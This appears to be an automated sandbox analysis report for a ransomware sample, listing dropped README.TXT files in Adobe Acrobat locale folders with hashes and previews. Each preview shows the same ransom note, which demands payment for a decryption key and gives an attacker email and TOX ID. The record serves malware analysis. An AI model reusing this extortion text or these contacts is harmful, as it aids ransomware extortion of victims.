                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\en-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\en-gb\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\en-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\es-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\eu-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\fi-fi\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\fr-fr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\fr-ma\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\he-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\hr-hr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\hu-hu\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\it-it\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ja-jp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ko-kr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\nb-no\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\nl-nl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\pl-pl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
